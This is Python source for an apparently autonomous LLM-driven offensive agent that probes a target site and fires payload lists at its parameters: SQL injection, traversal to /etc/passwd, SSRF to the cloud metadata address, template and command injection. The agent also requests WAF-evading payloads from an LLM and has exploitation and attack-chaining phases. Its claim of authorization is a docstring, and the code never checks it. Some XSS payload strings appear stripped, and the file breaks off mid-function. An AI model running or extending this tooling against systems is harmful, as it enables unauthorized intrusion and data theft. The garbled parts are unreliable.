"""
NeuroSploit v3 - AI Offensive Security Agent
This is a TRUE AI AGENT that:
1. Uses LLM for INTELLIGENT vulnerability testing (not blind payloads)
2. Analyzes responses with AI to confirm vulnerabilities (no false positives)
3. Uses recon data to inform testing strategy
4. Accepts custom .md prompt files
5. Generates real PoC code and exploitation steps
AUTHORIZATION: This is an authorized penetration testing tool.
All actions are performed with explicit permission.
"""
import asyncio
import aiohttp
import json
import re
import os
import sys
from typing import Dict, List, Any, Optional, Callable, Tuple
from dataclasses import dataclass, field
from datetime import datetime
from urllib.parse import urljoin, urlparse, parse_qs, urlencode, quote
from enum import Enum
from pathlib import Path
# Add parent path for imports
sys.path.insert(0, str(Path(__file__).parent.parent.parent))
try:
from core.llm_manager import LLMManager
except ImportError:
LLMManager = None
class AgentAction(Enum):
"""Actions the agent can take"""
DISCOVER = "discover"
TEST = "test"
EXPLOIT = "exploit"
CHAIN = "chain"
REPORT = "report"
PIVOT = "pivot"
@dataclass
class Finding:
"""A vulnerability finding with exploitation details"""
vuln_type: str
severity: str
endpoint: str
payload: str
evidence: str
exploitable: bool
confidence: str = "high" # high, medium, low
exploitation_steps: List[str] = field(default_factory=list)
poc_code: str = ""
impact: str = ""
chained_with: List[str] = field(default_factory=list)
raw_request: str = ""
raw_response: str = ""
llm_analysis: str = ""
@dataclass
class AgentState:
"""Current state of the AI agent"""
target: str
discovered_endpoints: List[str] = field(default_factory=list)
discovered_params: Dict[str, List[str]] = field(default_factory=dict)
technologies: List[str] = field(default_factory=list)
findings: List[Finding] = field(default_factory=list)
tested_payloads: Dict[str, List[str]] = field(default_factory=dict)
session_cookies: Dict[str, str] = field(default_factory=dict)
auth_tokens: List[str] = field(default_factory=list)
waf_detected: bool = False
waf_type: str = ""
current_phase: str = "recon"
actions_taken: List[str] = field(default_factory=list)
recon_context: Optional[Dict] = None
class AIPentestAgent:
"""
Autonomous AI Agent for Offensive Security Testing
This agent uses LLM to make INTELLIGENT decisions:
- What to test based on recon data
- How to craft context-aware payloads
- How to analyze responses to CONFIRM vulnerabilities
- How to chain attacks for maximum impact
NO FALSE POSITIVES - Every finding is confirmed by AI analysis.
"""
def __init__(
self,
target: str,
llm_manager: Optional[Any] = None,
log_callback: Optional[Callable] = None,
auth_headers: Optional[Dict] = None,
max_depth: int = 5,
prompt_file: Optional[str] = None,
recon_context: Optional[Dict] = None,
config: Optional[Dict] = None
):
self.target = target
self.llm_manager = llm_manager
self.log = log_callback or self._default_log
self.auth_headers = auth_headers or {}
self.max_depth = max_depth
self.prompt_file = prompt_file
self.custom_prompt = None
self.config = config or {}
self.state = AgentState(target=target, recon_context=recon_context)
self.session: Optional[aiohttp.ClientSession] = None
# Load custom prompt if provided
if prompt_file:
self._load_custom_prompt(prompt_file)
# Initialize LLM manager if not provided
if not self.llm_manager and LLMManager and config:
try:
self.llm_manager = LLMManager(config)
except Exception as e:
print(f"Warning: Could not initialize LLM manager: {e}")
# Base payloads - LLM will enhance these based on context
self.base_payloads = self._load_base_payloads()
async def _default_log(self, level: str, message: str):
print(f"[{level.upper()}] {message}")
def _load_custom_prompt(self, prompt_file: str):
"""Load custom prompt from .md file"""
try:
path = Path(prompt_file)
if not path.exists():
# Try in prompts directory
path = Path("prompts") / prompt_file
if not path.exists():
path = Path("prompts/md_library") / prompt_file
if path.exists():
content = path.read_text()
self.custom_prompt = content
print(f"[+] Loaded custom prompt from: {path}")
else:
print(f"[!] Prompt file not found: {prompt_file}")
except Exception as e:
print(f"[!] Error loading prompt file: {e}")
def _load_base_payloads(self) -> Dict[str, List[str]]:
"""Load base attack payloads - LLM will enhance these"""
return {
"xss": [
"",
"\">",
"'-alert(1)-'",
"
",
],
"sqli": [
"'", "\"", "' OR '1'='1", "1' AND '1'='1",
"' UNION SELECT NULL--", "1' AND SLEEP(3)--",
],
"lfi": [
"../../../etc/passwd",
"....//....//etc/passwd",
"php://filter/convert.base64-encode/resource=index.php",
],
"ssti": [
"{{7*7}}", "${7*7}", "<%= 7*7 %>",
"{{config}}", "{{self.__class__}}",
],
"ssrf": [
"http://127.0.0.1", "http://localhost",
"http://169.254.169.254/latest/meta-data/",
],
"rce": [
"; id", "| id", "$(id)", "`id`",
],
}
async def __aenter__(self):
connector = aiohttp.TCPConnector(ssl=False, limit=10)
timeout = aiohttp.ClientTimeout(total=30)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
headers.update(self.auth_headers)
self.session = aiohttp.ClientSession(connector=connector, timeout=timeout, headers=headers)
return self
async def __aexit__(self, *args):
if self.session:
await self.session.close()
async def run(self) -> Dict[str, Any]:
"""
Main agent loop - Think, Act, Observe, Adapt
Uses LLM for intelligent decision making at each step.
"""
await self.log("info", "=" * 60)
await self.log("info", "AI OFFENSIVE SECURITY AGENT ACTIVATED")
await self.log("info", "=" * 60)
await self.log("info", f"Target: {self.target}")
await self.log("info", f"Mode: LLM-POWERED INTELLIGENT TESTING")
if self.custom_prompt:
await self.log("info", f"Custom prompt loaded: {len(self.custom_prompt)} chars")
await self.log("info", "")
try:
# Phase 1: Reconnaissance (use recon data if available)
await self.log("info", "[PHASE 1] RECONNAISSANCE")
await self._recon_phase()
# Phase 2: LLM-Powered Vulnerability Testing
await self.log("info", "")
await self.log("info", "[PHASE 2] INTELLIGENT VULNERABILITY TESTING")
await self._testing_phase()
# Phase 3: Exploitation (only confirmed vulnerabilities)
if self.state.findings:
await self.log("info", "")
await self.log("info", "[PHASE 3] EXPLOITATION")
await self._exploitation_phase()
# Phase 4: Attack Chaining
if len(self.state.findings) > 1:
await self.log("info", "")
await self.log("info", "[PHASE 4] ATTACK CHAINING")
await self._chaining_phase()
# Generate Report
await self.log("info", "")
await self.log("info", "[PHASE 5] REPORT GENERATION")
report = await self._generate_report()
return report
except Exception as e:
await self.log("error", f"Agent error: {str(e)}")
import traceback
traceback.print_exc()
return {"error": str(e), "findings": [f.__dict__ for f in self.state.findings]}
async def _recon_phase(self):
"""Reconnaissance - use existing recon data or perform basic discovery"""
# Use recon context if available
if self.state.recon_context:
await self.log("info", " Using provided recon context...")
await self._load_recon_context()
else:
await self.log("info", " Performing basic reconnaissance...")
await self._basic_recon()
await self.log("info", f" Found {len(self.state.discovered_endpoints)} endpoints")
await self.log("info", f" Found {sum(len(v) for v in self.state.discovered_params.values())} parameters")
await self.log("info", f" Technologies: {', '.join(self.state.technologies[:5]) or 'Unknown'}")
async def _load_recon_context(self):
"""Load data from recon context"""
ctx = self.state.recon_context
# Load endpoints from various recon sources
if ctx.get("data", {}).get("endpoints"):
self.state.discovered_endpoints.extend(ctx["data"]["endpoints"][:100])
if ctx.get("data", {}).get("urls"):
self.state.discovered_endpoints.extend(ctx["data"]["urls"][:100])
if ctx.get("data", {}).get("crawled_urls"):
self.state.discovered_endpoints.extend(ctx["data"]["crawled_urls"][:100])
# Load parameters
if ctx.get("data", {}).get("parameters"):
for param_data in ctx["data"]["parameters"]:
if isinstance(param_data, dict):
url = param_data.get("url", self.target)
params = param_data.get("params", [])
self.state.discovered_params[url] = params
elif isinstance(param_data, str):
self.state.discovered_params[self.target] = self.state.discovered_params.get(self.target, []) + [param_data]
# Load technologies
if ctx.get("data", {}).get("technologies"):
self.state.technologies.extend(ctx["data"]["technologies"])
# Load from attack surface
if ctx.get("attack_surface"):
surface = ctx["attack_surface"]
if surface.get("live_hosts"):
for host in surface.get("live_urls", [])[:50]:
if host not in self.state.discovered_endpoints:
self.state.discovered_endpoints.append(host)
# Deduplicate
self.state.discovered_endpoints = list(set(self.state.discovered_endpoints))
async def _basic_recon(self):
"""Perform basic reconnaissance when no recon data is available"""
# Fingerprint
await self._fingerprint_target()
# Discover common endpoints
common_paths = [
"/", "/login", "/admin", "/api", "/api/v1",
"/user", "/search", "/upload", "/config",
"/?id=1", "/?page=1", "/?q=test",
]
parsed = urlparse(self.target)
base_url = f"{parsed.scheme}://{parsed.netloc}"
for path in common_paths:
url = urljoin(base_url, path)
try:
async with self.session.get(url, allow_redirects=False) as resp:
if resp.status < 400 and resp.status != 404:
self.state.discovered_endpoints.append(url)
# Extract params
if "?" in url:
parsed_url = urlparse(url)
params = list(parse_qs(parsed_url.query).keys())
self.state.discovered_params[url] = params
except:
pass
async def _fingerprint_target(self):
"""Fingerprint the target"""
try:
async with self.session.get(self.target) as resp:
body = await resp.text()
headers = dict(resp.headers)
# Server detection
server = headers.get("Server", "")
if server:
self.state.technologies.append(f"Server: {server}")
# X-Powered-By
powered = headers.get("X-Powered-By", "")
if powered:
self.state.technologies.append(powered)
# Technology signatures
tech_sigs = {
"PHP": [".php", "PHPSESSID"],
"ASP.NET": [".aspx", "__VIEWSTATE"],
"Java": [".jsp", "JSESSIONID"],
"Python": ["django", "flask"],
"Node.js": ["express", "connect.sid"],
"WordPress": ["wp-content", "wp-includes"],
"Laravel": ["laravel", "XSRF-TOKEN"],
}
for tech, sigs in tech_sigs.items():
for sig in sigs:
if sig.lower() in body.lower() or sig in str(headers):
if tech not in self.state.technologies:
self.state.technologies.append(tech)
break
except Exception as e:
await self.log("debug", f"Fingerprint error: {e}")
async def _testing_phase(self):
"""LLM-powered vulnerability testing"""
# Determine what to test based on recon data
test_strategy = await self._get_test_strategy()
# Get endpoints to test
endpoints = self.state.discovered_endpoints[:20] or [self.target]
for endpoint in endpoints:
await self.log("info", f" Testing: {endpoint[:60]}...")
for vuln_type in test_strategy:
# Get LLM-enhanced payloads for this context
payloads = await self._get_smart_payloads(endpoint, vuln_type)
for payload in payloads[:5]:
result = await self._test_and_verify(endpoint, vuln_type, payload)
if result and result.get("confirmed"):
finding = Finding(
vuln_type=vuln_type,
severity=self._get_severity(vuln_type),
endpoint=endpoint,
payload=payload,
evidence=result.get("evidence", ""),
exploitable=result.get("exploitable", False),
confidence=result.get("confidence", "high"),
llm_analysis=result.get("analysis", ""),
raw_request=result.get("request", ""),
raw_response=result.get("response", "")[:2000],
impact=self._get_impact(vuln_type),
)
self.state.findings.append(finding)
await self.log("warning", f" [CONFIRMED] {vuln_type.upper()} - {result.get('confidence', 'high')} confidence")
break # Found vuln, move to next type
async def _get_test_strategy(self) -> List[str]:
"""Use LLM to determine what to test based on recon data"""
# Default strategy
default_strategy = ["xss", "sqli", "lfi", "ssti", "ssrf"]
if not self.llm_manager:
return default_strategy
try:
# Build context for LLM
context = {
"target": self.target,
"technologies": self.state.technologies,
"endpoints_count": len(self.state.discovered_endpoints),
"parameters_count": sum(len(v) for v in self.state.discovered_params.values()),
"sample_endpoints": self.state.discovered_endpoints[:5],
}
prompt = f"""Based on the following reconnaissance data, determine the most likely vulnerability types to test.
Target: {context['target']}
Technologies detected: {', '.join(context['technologies']) or 'Unknown'}
Endpoints found: {context['endpoints_count']}
Parameters found: {context['parameters_count']}
Sample endpoints: {context['sample_endpoints']}
Custom instructions: {self.custom_prompt[:500] if self.custom_prompt else 'None'}
Return a JSON array of vulnerability types to test, ordered by likelihood.
Valid types: xss, sqli, lfi, rce, ssti, ssrf, xxe, idor, open_redirect
Example: ["sqli", "xss", "lfi"]
IMPORTANT: Only return the JSON array, no other text."""
response = self.llm_manager.generate(prompt, "You are a penetration testing expert. Analyze recon data and suggest vulnerability tests.")
# Parse response
try:
# Find JSON array in response
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
strategy = json.loads(match.group())
if isinstance(strategy, list) and len(strategy) > 0:
return strategy[:7]
except:
pass
except Exception as e:
await self.log("debug", f"LLM strategy error: {e}")
return default_strategy
async def _get_smart_payloads(self, endpoint: str, vuln_type: str) -> List[str]:
"""Get context-aware payloads from LLM"""
base = self.base_payloads.get(vuln_type, [])
if not self.llm_manager:
return base
try:
# Get endpoint context
params = self.state.discovered_params.get(endpoint, [])
techs = self.state.technologies
prompt = f"""Generate 3 specialized {vuln_type.upper()} payloads for this context:
Endpoint: {endpoint}
Parameters: {params}
Technologies: {techs}
WAF detected: {self.state.waf_detected} ({self.state.waf_type})
Requirements:
1. Payloads should be tailored to the detected technologies
2. If WAF detected, use evasion techniques
3. Include both basic and advanced payloads
Return ONLY a JSON array of payload strings.
Example: ["payload1", "payload2", "payload3"]"""
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate effective but safe test payloads.")
try:
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
smart_payloads = json.loads(match.group())
if isinstance(smart_payloads, list):
return smart_payloads + base
except:
pass
except Exception as e:
await self.log("debug", f"Smart payload error: {e}")
return base
async def _test_and_verify(self, endpoint: str, vuln_type: str, payload: str) -> Optional[Dict]:
"""Test a payload and use LLM to verify if it's a real vulnerability"""
try:
# Prepare request
parsed = urlparse(endpoint)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
# Build params with payload
params = {}
if parsed.query:
for p in parsed.query.split("&"):
if "=" in p:
k, v = p.split("=", 1)
params[k] = payload
else:
test_params = self.state.discovered_params.get(endpoint, []) or ["id", "q", "search"]
for p in test_params[:3]:
params[p] = payload
# Send request
async with self.session.get(base_url, params=params, allow_redirects=False) as resp:
body = await resp.text()
status = resp.status
headers = dict(resp.headers)
# Build raw request for logging
raw_request = f"GET {resp.url}\n"
raw_request += "\n".join([f"{k}: {v}" for k, v in self.auth_headers.items()])
# First, do quick checks for obvious indicators
quick_result = self._quick_vuln_check(vuln_type, payload, body, status, headers)
if not quick_result.get("possible"):
return None
# If possible vulnerability, use LLM to confirm
if self.llm_manager:
confirmation = await self._llm_confirm_vulnerability(
vuln_type, payload, body[:3000], status, headers, endpoint
)
if confirmation.get("confirmed"):
return {
"confirmed": True,
"evidence": confirmation.get("evidence", quick_result.get("evidence", "")),
"exploitable": confirmation.get("exploitable", False),
"confidence": confirmation.get("confidence", "medium"),
"analysis": confirmation.get("analysis", ""),
"request": raw_request,
"response": body[:2000],
}
else:
# No LLM, use quick check result
if quick_result.get("high_confidence"):
return {
"confirmed": True,
"evidence": quick_result.get("evidence", ""),
"exploitable": True,
"confidence": "medium",
"analysis": "Confirmed by response analysis (no LLM)",
"request": raw_request,
"response": body[:2000],
}
except asyncio.TimeoutError:
if vuln_type == "sqli":
return {
"confirmed": True,
"evidence": "Request timeout - possible time-based SQL injection",
"exploitable": True,
"confidence": "medium",
"analysis": "Time-based blind SQLi detected",
}
except Exception as e:
await self.log("debug", f"Test error: {e}")
return None
def _quick_vuln_check(self, vuln_type: str, payload: str, body: str, status: int, headers: Dict) -> Dict:
"""Quick vulnerability check without LLM"""
result = {"possible": False, "high_confidence": False, "evidence": ""}
body_lower = body.lower()
if vuln_type == "xss":
# Check for exact payload reflection (unencoded)
if payload in body and "<" in payload:
result["possible"] = True
result["evidence"] = "XSS payload reflected without encoding"
# High confidence only if script tags execute
if "